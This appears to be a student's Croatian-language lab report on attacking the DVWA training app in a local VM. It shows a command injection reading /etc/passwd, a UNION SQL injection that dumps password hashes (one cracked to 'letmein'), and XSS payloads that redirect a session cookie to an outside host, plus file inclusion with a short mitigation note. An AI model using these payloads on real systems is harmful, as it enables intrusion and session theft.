NAT sučelje:		10.0.2.15
"bridged" sučelje:	172.20.10.2
"host-only" sučelje:	192.168.218.3
----------------------------------------------------------------------------------------------------
		1. Command Injection
Napadi umetanjem mogući su kad aplikacija šalje ranjive podatke (npr. unos u formi), HTTP zaglavlja
i sl.) sistemskoj ljusci.

ULAZ: 	1 | cat /etc/passwd
IZLAZ:	root:x:0:0:root:/root:/bin/bash
	daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
	bin:x:2:2:bin:/bin:/usr/sbin/nologin
	sys:x:3:3:sys:/dev:/usr/sbin/nologin
	sync:x:4:65534:sync:/bin:/bin/sync
	games:x:5:60:games:/usr/games:/usr/sbin/nologin
	man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
	lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
	mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
	news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
	uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
	proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
	www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
	backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
	list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
	irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
	gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
	nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
	_apt:x:100:65534::/nonexistent:/bin/false
	mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false
----------------------------------------------------------------------------------------------------
		2. SQL Injection
Napadi SQL umetanjem predstavljaju veliku opasnost za aplikacije koje koriste povjerljive podatke
koji mogu lako postati dostupni napadaču koji zna umetnuti SQL statement u svoj upit.

U ovom smo zadatku pomoću umetanja SQL statementa uspjeli dobiti ispis sažetka lozinke za svakog
korisnika zajedno s njegovim prezimenom, što nam je omogućilo uvid u parove korisnik-sažetak. Te su
nam informacije omogućile da saznamo da je za korisnika s prezimenom Picasso (koji je naša meta)
sažetak lozinke "0d107d09f5bbe40cade3de5c71e9e9b7". Pomoću web stranice crackstation.net doznajemo
da je lozinka za koju je dobiven dotični hash "letmein".

ULAZ:	?id=1' UNION SELECT password, last_name FROM users WHERE user_id='random' OR '1'='1
IZLAZ:	ID: ?id=1' UNION SELECT password, last_name FROM users WHERE user_id='random' OR '1'='1
	First name: 5f4dcc3b5aa765d61d8327deb882cf99
	Surname: admin

	ID: ?id=1' UNION SELECT password, last_name FROM users WHERE user_id='random' OR '1'='1
	First name: e99a18c428cb38d5f260853678922e03
	Surname: Brown

	ID: ?id=1' UNION SELECT password, last_name FROM users WHERE user_id='random' OR '1'='1
	First name: 8d3533d75ae2c3966d7e0d4fcc69216b
	Surname: Me

	ID: ?id=1' UNION SELECT password, last_name FROM users WHERE user_id='random' OR '1'='1
	First name: 0d107d09f5bbe40cade3de5c71e9e9b7
	Surname: Picasso

	ID: ?id=1' UNION SELECT password, last_name FROM users WHERE user_id='random' OR '1'='1
	First name: 5f4dcc3b5aa765d61d8327deb882cf99
	Surname: Smith
----------------------------------------------------------------------------------------------------
		3.a Cross Site Scripting (Stored)
Ovaj tip XSS-a pohranjen je na poslužitelju. Da bismo dobili korisnikove cookieje (konkretno u ovom
slučaju session ID) koristimo naredbu koja ispisuje taj ID u obliku Javascript alerta.

ULAZ:	<script>alert(document.cookie)</script>
IZLAZ:	PHPSESSID=mat7b28i2ftu23fl7igrbtlvc6; security=low

Zatim taj ID predajemo u HTML headeru na željenu lokaciju. Pošto je duljina unosa u "Message" polju
ograničena na 50 znakova, pomoću "Inspect Element" alata pronađemo taj text area u formi i samo mu
ručno promijenimo maksimalnu duljinu (u našem slučaju dovoljno je bilo 150 znakova).

ULAZ:	<script>document.location.href="http://public.tel.fer.hr/srs?cookie=security=low;%20PHPSESS
	ID=mat7b28i2ftu23fl7igrbtlvc6";</script>

		3.b Cross Site Scripting (Reflected)
Ovaj tip XSS-a dio je URL-a pa je potrebna samo poveznica da bi se izveo. Potrebno je 

ULAZ:	<script>document.location.href="http://public.tel.fer.hr/srs?cookie=security=low;	%20PHPSESSID=mat7b28i2ftu23fl7igrbtlvc6";</script>
----------------------------------------------------------------------------------------------------
		4. File Inclusion
Kako bismo pristupili datoteci /etc/passwd potrebno je kao HTTP GET parametar predati /etc/passwd. S obzirom na to da na serveru nisu konfigurirana ograničenja pristupa lokalnim datotekama, prikazuje
se sadržaj datoteke /etc/passwd.

ULAZ:	http://172.20.10.2/vulnerabilities/fi/?page=/etc/passwd
IZLAZ:	[priložen screenshot file_inclusion.jpg]

Ovu vrstu napada možemo spriječiti whitelistom dopuštenih datoteka za prikaz (praktički hardkodira-
nje), programski u kodu ili korištenjem konfiguracijskih datoteka poput .htaccess. Uklanjanjem iz
ulaza znakova poput / možemo onemogućiti kretanje kroz direktorije i na taj način postići doda-
tnu sigurnost.